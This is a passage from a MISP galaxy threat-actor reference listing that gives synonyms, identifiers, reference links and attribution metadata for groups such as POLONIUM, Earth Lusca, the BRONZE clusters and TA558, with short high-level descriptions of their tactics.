- https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Afghanistan', 'India', 'Indonesia', 'Iran', 'Kyrgyzstan', 'Malaysia', 'Pakistan', 'Russia', 'Slovakia', 'Taiwan', 'Thailand', 'United Kingdom', 'Uzbekistan', 'Vietnam'] |
cfr-target-category | ['Military', 'Government'] |
POLONIUM
Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POLONIUM.
Known Synonyms |
---|
GREATRIFT |
Plaid Rain |
UNC4453 |
Internal MISP references
UUID 3c5129ea-8f18-4bcf-a33b-b5aab0720494
which can be used as unique global reference for POLONIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/ - webarchive
- https://www.deepinstinct.com/blog/polonium-apt-group-uncovering-new-elements - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | Lebanon |
cfr-suspected-victims | ['Israel'] |
cfr-target-category | ['Critical manufacturing', 'Defense industrial base', 'Financial services', 'Food and agriculture', 'Government agencies and services', 'Healthcare', 'Pharmaceuticals', 'Information technology', 'Transportation systems', 'NGOs', 'Civil Society', 'Military', 'Defense'] |
cfr-type-of-incident | Espionage |
country | LB |
Related clusters
To see the related clusters, click here.
Predatory Sparrow
A self-proclaimed hacktivist group that carried out attacks against Iranian railway systems and against Iranian steel plants.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Predatory Sparrow.
Known Synonyms |
---|
Gonjeshke Darande |
Indra |
Internal MISP references
UUID e665ac2f-87b4-4c2e-bef7-78bf0a8af87b
which can be used as unique global reference for Predatory Sparrow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Iran'] |
cfr-target-category | ['Critical manufacturing', 'Transportation systems'] |
cfr-type-of-incident | Sabotage |
DEV-0586
MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware (WhisperGate), which is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0586.
Known Synonyms |
---|
Cadet Blizzard |
Ruinous Ursa |
Internal MISP references
UUID a5f64c1a-c829-4855-903d-e0ff2098b2d7
which can be used as unique global reference for DEV-0586
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/ruinousursa/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine'] |
cfr-type-of-incident | Sabotage |
country | RU |
Related clusters
To see the related clusters, click here.
Kinsing
This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kinsing.
Known Synonyms |
---|
Money Libra |
Internal MISP references
UUID bc6f3b91-5a28-46df-9778-179218c809fe
which can be used as unique global reference for Kinsing
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html - webarchive
- https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability - webarchive
- https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/moneylibra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Earth Berberoka
According to TrendMicro, Earth Berberoka is a threat group originating from China that mainly focuses on targeting gambling websites. This group's campaign uses multiple malware families that target the Windows, Linux, and macOS platforms that have been attributed to Chinese-speaking actors. Aside from using tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, Earth Berberoka has also developed a brand-new complex, multistage malware family, which has been dubbed PuppetLoader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Berberoka.
Known Synonyms |
---|
GamblingPuppet |
Internal MISP references
UUID 9d82077b-7e95-4b22-8762-3224797ff5f0
which can be used as unique global reference for Earth Berberoka
in MISP communities and other software using the MISP galaxy
External references
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-domains-2.txt - webarchive
- https://www.youtube.com/watch?v=QXGO4RJaUPQ - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/ - webarchive
- https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['China', 'United States', 'Hong Kong', 'Malaysia', 'Taiwan'] |
cfr-target-category | ['Gambling Websites', 'Information technology', 'Electronics Manufacturers', 'Education'] |
country | CN |
Earth Lusca
Earth Lusca is a threat actor from China that targets organizations of interest to the Chinese government, including academic institutions, telecommunication companies, religious organizations, and other civil society groups. Earth Lusca's tools closely resemble those used by Winnti Umbrella, but the group appears to operate separately from Winnti. Earth Lusca has also been observed targeting cryptocurrency payment platforms and cryptocurrency exchanges in what are likely financially motivated attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Lusca.
Known Synonyms |
---|
AQUATIC PANDA |
BRONZE UNIVERSITY |
BountyGlad |
CHROMIUM |
Charcoal Typhoon |
ControlX |
FISHMONGER |
Red Dev 10 |
Red Scylla |
RedHotel |
TAG-22 |
Internal MISP references
UUID 39150b30-61af-4d9c-9682-1595e145f3c1
which can be used as unique global reference for Earth Lusca
in MISP communities and other software using the MISP galaxy
External references
- https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
- https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E - webarchive
- https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html - webarchive
- https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools - webarchive
- https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://securelist.com/apt-annual-review-2021/105127 - webarchive
- https://securelist.com/apt-trends-report-q2-2021/103517 - webarchive
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/jolly-jellyfish/NCSC-MAR-Jolly-Jellyfish.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/pdf/2022-year-in-retrospect-report.pdf - webarchive
- https://www.youtube.com/watch?v=-7Swd1ZetiQ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia', 'China', 'France', 'Germany', 'Hong Kong', 'Japan', 'Mongolia', 'Nepal', 'Nigeria', 'Philippines', 'Taiwan', 'Thailand', 'United Arab Emirates', 'United States', 'Vietnam'] |
cfr-target-category | ['Gambling companies', 'Government Institutions', 'Education', 'Media and Entertainment', 'Pro-democracy and human rights political organizations', 'Telecommunications', 'Religious organization', 'Cryptocurrency', 'Medical', 'Covid-19 research organizations'] |
country | CN |
Related clusters
To see the related clusters, click here.
Earth Wendigo
Earth Wendigo is a threat actor from China that has been targeting several organizations — including government organizations, research institutions, and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely used in Taiwan. The threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.
Internal MISP references
UUID c96e1329-cf7e-44ac-a3db-9e251dc98ec5
which can be used as unique global reference for Earth Wendigo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Hong Kong', 'Taiwan'] |
cfr-target-category | ['Government', 'Education'] |
country | CN |
BRONZE EDGEWOOD
In early 2021 CTU researchers observed BRONZE EDGEWOOD exploiting the Microsoft Exchange Server of an organization in Southeast Asia. The threat group deployed a China Chopper webshell and ran the Nishang Invoke-PowerShellTcp.ps1 script to connect back to C2 infrastructure. The threat group is publicly linked to malware families Chinoxy, PCShare and FunnyDream. CTU researchers have discovered that BRONZE EDGEWOOD also leverages Cobalt Strike in its intrusion activity. BRONZE EDGEWOOD has been active since at least 2018 and targets government and private enterprises across Southeast Asia. CTU researchers assess with moderate confidence that BRONZE EDGEWOOD operates on behalf the Chinese government and has a remit that covers political espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE EDGEWOOD.
Known Synonyms |
---|
Red Hariasa |
Internal MISP references
UUID b4ce9385-eedf-4a71-803c-6d53a250d10b
which can be used as unique global reference for BRONZE EDGEWOOD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Kyrgyzstan', 'Malaysia', 'Vietnam'] |
country | CN |
APT9
APT9 engages in cyber operations where the goal is data theft, usually focusing on the data and projects that make a particular organization competitive within its field. APT9 was historically very active in the pharmaceuticals and biotechnology industry. We have observed this actor use spearphishing, valid accounts, as well as remote services for Initial Access. On at least one occasion, Mandiant observed APT9 at two companies in the biotechnology industry and suspect that APT9 actors may have gained initial access to one of the companies by using a trusted relationship between the two companies. APT9 use a wide range of backdoors, including publicly available backdoors, as well as backdoors that are believed to be custom, but are used by multiple APT groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT9.
Known Synonyms |
---|
Group 27 |
NIGHTSHADE PANDA |
Red Pegasus |
Internal MISP references
UUID 7e6d82a4-3b7d-4c24-a2c5-e211ce6eafc5
which can be used as unique global reference for APT9
in MISP communities and other software using the MISP galaxy
External references
- https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393 - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn - webarchive
- https://news.softpedia.com/news/trochilus-rat-evades-antivirus-detection-used-for-cyber-espionage-in-south-east-asia-498776.shtml - webarchive
- https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Pharmaceuticals', 'Healthcare', 'Construction', 'Aerospace', 'Defense industrial base'] |
country | CN |
BRONZE SPRING
BRONZE SPRING is a threat group that CTU researchers assess with high confidence operates on behalf of China in the theft of intellectual property from defense, engineering, pharmaceutical and technology companies. The threat group typically uses scan-and-exploit for initial access, deploys the China Chopper webshell for remote execution and persistence, and creates RAR archives with a '.jpg' file extension for data exfiltration. In July 2020 the U.S. Department of Justice indicted two Chinese hackers CTU researchers assess are members of the BRONZE SPRING threat group. The Department of Justice allege these hackers were responsible for compromising networks of hundreds of organisations and individuals in the U.S. and abroad since 2009, and that exfiltrated data would be passed to the Chinese Ministry of State Security or sold for financial gain.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE SPRING.
Known Synonyms |
---|
UNC302 |
Internal MISP references
UUID 8b77424e-18bc-4ea7-baa4-d87441978e20
which can be used as unique global reference for BRONZE SPRING
in MISP communities and other software using the MISP galaxy
External references
- https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion - webarchive
- https://www.justice.gov/opa/press-release/file/1295981/download - webarchive
- https://www.justice.gov/opa/press-release/file/1295986/download - webarchive
- https://intrusiontruth.wordpress.com/2021/05/06/an-apt-with-no-name - webarchive
- https://twitter.com/MrDanPerez/status/1390285821786394624 - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['United States', 'Australia', 'Belgium', 'Germany', 'Japan', 'Lithuania', 'Netherlands', 'Spain', 'South Korea', 'Sweden', 'United Kingdom'] |
cfr-target-category | ['Information technology', 'Medical', 'Civil engineering', 'Business', 'Education', 'Gaming', 'Energy', 'Pharmaceuticals', 'Defense industrial base'] |
country | CN |
BRONZE STARLIGHT
BRONZE STARLIGHT has been active since mid 2021 and targets organizations globally across a range of industry verticals. The group leverages HUI Loader to load Cobalt Strike and PlugX payloads for command and control. CTU researchers have observed BRONZE STARLIGHT deploying ransomware to compromised networks as part of name-and-shame ransomware schemes, and posted victim names to leak sites. CTU researchers assess with moderate confidence that BRONZE STARLIGHT is located in China based on observed tradecraft, including the use of HUI Loader and PlugX which are associated with China-based threat group activity. It is plausible that BRONZE STARLIGHT deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation of stealing intellectual property theft or conducting espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE STARLIGHT.
Known Synonyms |
---|
Cinnamon Tempest |
DEV-0401 |
Emperor Dragonfly |
SLIME34 |
Internal MISP references
UUID 737c0207-1a1a-4480-86e7-b6a5066e1ee5
which can be used as unique global reference for BRONZE STARLIGHT
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation - webarchive
- https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility - webarchive
- https://twitter.com/cglyer/status/1480734487000453121 - webarchive
- https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group - webarchive
- https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Related clusters
To see the related clusters, click here.
BRONZE HIGHLAND
BRONZE HIGHLAND has been observed using spearphishing as an initial infection vector to deploy the MgBot remote access trojan against targets in Hong Kong. Third party reporting suggests the threat group also targets India, Malaysia and Taiwan and leverages Cobalt Strike and KsRemote Android Rat. CTU researchers assess with moderate confidence that BRONZE HIGHLAND operates on behalf of China and has a remit covering espionage against domestic human rights and pro-democracy advocates and nations neighbouring China
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE HIGHLAND.
Known Synonyms |
---|
Daggerfly |
Evasive Panda |
Internal MISP references
UUID 62710572-e416-419d-bb1f-81ffc1ddc976
which can be used as unique global reference for BRONZE HIGHLAND
in MISP communities and other software using the MISP galaxy
External references
- https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf - webarchive
- https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s - webarchive
- https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Hong Kong', 'Malaysia', 'India', 'Taiwan', 'Macao', 'Nigeria'] |
country | CN |
BRONZE SPIRAL
In December 2020, the IT management software provider SolarWinds announced that an unidentified threat actor had exploited a vulnerability in their Orion Platform software to deploy a web shell dubbed SUPERNOVA. CTU researchers track the operators of the SUPERNOVA web shell as BRONZE SPIRAL and assess with low confidence that the group is of Chinese origin. SUPERNOVA was likely deployed through exploitation of CVE-2020-10148, and CTU researchers observed post-exploitation reconnaissance commands roughly 30 minutes before the web shell was deployed. This may have been indicative of the threat actor conducting scan-and-exploit activity and then triaging for victims of particular interest, before deploying SUPERNOVA and attempting to dump credentials and move laterally.
BRONZE SPIRAL has been associated with previous intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property. The threat group makes extensive use of native system tools and 'living off the land' techniques.
Internal MISP references
UUID 3f04dbbc-69bc-409b-82a1-6135f0b6a41c
which can be used as unique global reference for BRONZE SPIRAL
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/solarstorm-supernova - webarchive
- https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis - webarchive
- https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group - webarchive
- https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar21-112a - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BRONZE VAPOR
BRONZE VAPOR is a targeted threat group assessed with moderate confidence to be of Chinese origin. Artefacts from tools associated with this group and open source reporting on related incidents indicate that BRONZE VAPOR have operated since at least 2017. The group conducts espionage against multiple industries including semiconductors, aviation and telecommunications. CTU researchers assess BRONZE VAPOR's intent to be information theft, with operations focused on intellectual property (semiconductors) and personally identifiable information such as traveller records (aviation). Compromise of telecommunications companies can yield personally identifiable information and meta data on client communications such as Call Data Records (CDR).
Prior to 2019 their operational focus, with some exceptions, revolved around targets in East Asia particularity Taiwan with it's thriving semiconductor industry. In 2021 details emerged in open source of attacks on at least one European semiconductor company believed to date back to 2017. In 2019 BRONZE VAPOR attacked one of more entities in the European airlines sector. The group gains initial access via VPN services, may use spearphishing with 'Letter of Appointment' themed lures, and deploys Cobalt Strike along with custom data exfiltration tools to target organizations. Post-intrusion activity involves living-of-the-land using legitimate tools and commands available within victim environment as well as using AceHash for credential harvesting, WATERCYCLE for data exfiltration and STOCKPIPE for proxying information through Microsoft Exchange servers over email.
BRONZE VAPOR uses a set of tactics that, although not individually unique, when viewed in aggregate create a relatively distinct playbook. Intrusions begin with credential based attacks against an existing remote access solution (Citrix, VPN etc.) or B2B network access. Cobalt Strike is deployed into the environment and further access is then conducted via Cobalt Strike Beacon and other features of the platform. Sharphound is deployed to map out the victim's Active Directory infrastructure and and collect critical information about the domain including important account names. Command and control infrastructure is hosted on subdomains of Azure and Appspot services to blend in with legitimate traffic. The threat actor also registers their own domains for command and control, often with a "sync" or "update" related theme. WinRAR is commonly used for compressing data prior to exfiltration. Filenames for these archives often involve a string of numbers and variations of the word "update". Data is exfiltrated using WATERCYCLE to cloud based platforms such as OneDrive and GoogleDrive.
Internal MISP references
UUID af12a336-bb68-41ff-866a-834cedc0b5fc
which can be used as unique global reference for BRONZE VAPOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Taiwan'] |
cfr-target-category | ['Semiconductor Industry'] |
country | CN |
Vicious Panda
Check Point Research discovered a new campaign against the Mongolian public sector, which takes advantage of the current Coronavirus scare, in order to deliver a previously unknown malware implant to the target. A closer look at this campaign allowed us to tie it to other operations which were carried out by the same anonymous group, dating back to at least 2016. Over the years, these operations targeted different sectors in multiple countries, such as Ukraine, Russia, and Belarus.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vicious Panda.
Known Synonyms |
---|
SixLittleMonkeys |
Internal MISP references
UUID 68d8c25b-8595-4c20-a5c7-a11a2a34b717
which can be used as unique global reference for Vicious Panda
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/microcin-is-here/97353 - webarchive
- https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636 - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia - webarchive
- https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign - webarchive
- https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897 - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937 - webarchive
- https://securelist.com/it-threat-evolution-q2-2020/98230 - webarchive
- https://securelist.com/apt-trends-report-q3-2021/104708 - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Belarus', 'Russia', 'Mongolia', 'Ukraine'] |
country | CN |
Red Nue
Red Nue, active since at least 2017, is known for its use of the multi-platform LootRAt backdoor, also known as ReverseWindow. LootRAT has variants for Windows and Macintosh (reported in open source as Demsty), as well as an Android variant known as SpyDealer. Red Nue has also used another Windows backdoor known as WinDealer since at least 2019, when it deployed it to targets as part of a watering hole campaign on a Chinese news website for the Chinese diaspora community. Parts of Asia feature heavily in Red Nue's victimology.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Red Nue.
Known Synonyms |
---|
LuoYu |
Internal MISP references
UUID c73c8a76-1e44-44d6-b955-79f3a73582a1
which can be used as unique global reference for Red Nue
in MISP communities and other software using the MISP galaxy
External references
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2021/10/windealer.html - webarchive
- https://securelist.com/windealer-dealing-on-the-side/105946 - webarchive
- https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Pickaxe
Prying Libra, also known as Pickaxe, is a threat actor active since at least August 2017, and continues to remain active to this day. The adversary's goal is to install and maintain a popular cryptocurrency miner on the victim's machine. The miner in question is an open-source tool named XMRig that generates the Monero cryptocurrency. Malware is delivered via downloads through the popular Adfly advertisement platform. Users are often mislead into clicking on a malicious advertisement that results in the payload being delivered to the victim. Once installed, the malware leverages VBS scripts and redirection services, such as bitly, to ultimately download and execute XMRig. Over 15 million confirmed victims have been discovered to be infected in recent campaigns, with actual numbers likely to be between 30-45 million victims. The victims are found across the globe, with high concentrations in Thailand, Vietnam, Egypt, Indonesia, and Turkey.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pickaxe.
Known Synonyms |
---|
Prying Libra |
Internal MISP references
UUID 1bfd16ae-fd98-4a96-9397-d1651548bda2
which can be used as unique global reference for Pickaxe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Watchdog
Thief Libra is a cloud-focused threat group that has a history of cryptojacking operations as well as cloud service platform credential scraping. They were first known to operate on January 27, 2019. They use a variety of custom build Go Scripts as well as repurposed cryptojacking scripts from other groups including TeamTNT. They are currently considered to be an opportunistic threat group that targets exposed cloud instances and applications.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Watchdog.
Known Synonyms |
---|
Thief Libra |
Internal MISP references
UUID 4b4b4717-d31e-4be6-a3ba-b13edb42decd
which can be used as unique global reference for Watchdog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Returned Libra
Returned Libra, also known as 8220 Mining Group, is a cloud threat actor group that has been active since at least 2017. Tools commonly employed during their operations are PwnRig or DBUsed which are customized variants of the XMRig Monero mining software. The Returned Libra mining group is believed to have originated from a GitHub fork of the Rocke group's software. Returned Libra has elevated its mining operations with the use of cloud service platform credential scrapping.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Returned Libra.
Known Synonyms |
---|
8220 Mining Group |
Internal MISP references
UUID 7831d56e-5913-44ca-8835-f42017aeb0cd
which can be used as unique global reference for Returned Libra
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TianWu
Internal MISP references
UUID a3831248-5e2f-492d-8bb6-5e82c2f6481d
which can be used as unique global reference for TianWu
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies - webarchive
- https://github.com/avast/ioc/tree/master/OperationDragonCastling - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['China', 'Hong Kong', 'Kazakhstan', 'Taiwan', 'Philippines'] |
cfr-target-category | ['Private Sector', 'Gambling companies', 'Gaming', 'Information technology', 'Telecommunications', 'Government', 'Transportation systems', 'Dissident'] |
country | CN |
SLIME29
Internal MISP references
UUID d58030e2-5673-4836-9aff-ab6d55da0bc0
which can be used as unique global reference for SLIME29
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | China |
cfr-target-category | ['Private Sector'] |
country | CN |
GOBLIN PANDA
Goblin Panda is one of a handful of elite Chinese advanced persistent threat (APT) groups. Most Chinese APTs target the United States and NATO, but Goblin Panda focuses primarily on Southeast Asia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOBLIN PANDA.
Known Synonyms |
---|
Conimes |
Cycldek |
Internal MISP references
UUID 8d73715a-8bbd-4eaa-ae24-2f1b1c84cf21
which can be used as unique global reference for GOBLIN PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/ - webarchive
- https://securelist.com/cycldek-bridging-the-air-gap/97157/ - webarchive
- https://www.fortinet.com/blog/threat-research/cta-security-playbook--goblin-panda.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Malaysia', 'India', 'Indonesia', 'Japan', 'Philippines', 'Southeast Asia', 'South Korea', 'Vietnam'] |
cfr-target-category | ['Private Sector'] |
country | CN |
TA558
Since 2018, security researchers tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads.
Internal MISP references
UUID e1e70539-8916-45c2-9b01-891c1c5bd8a1
which can be used as unique global reference for TA558
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
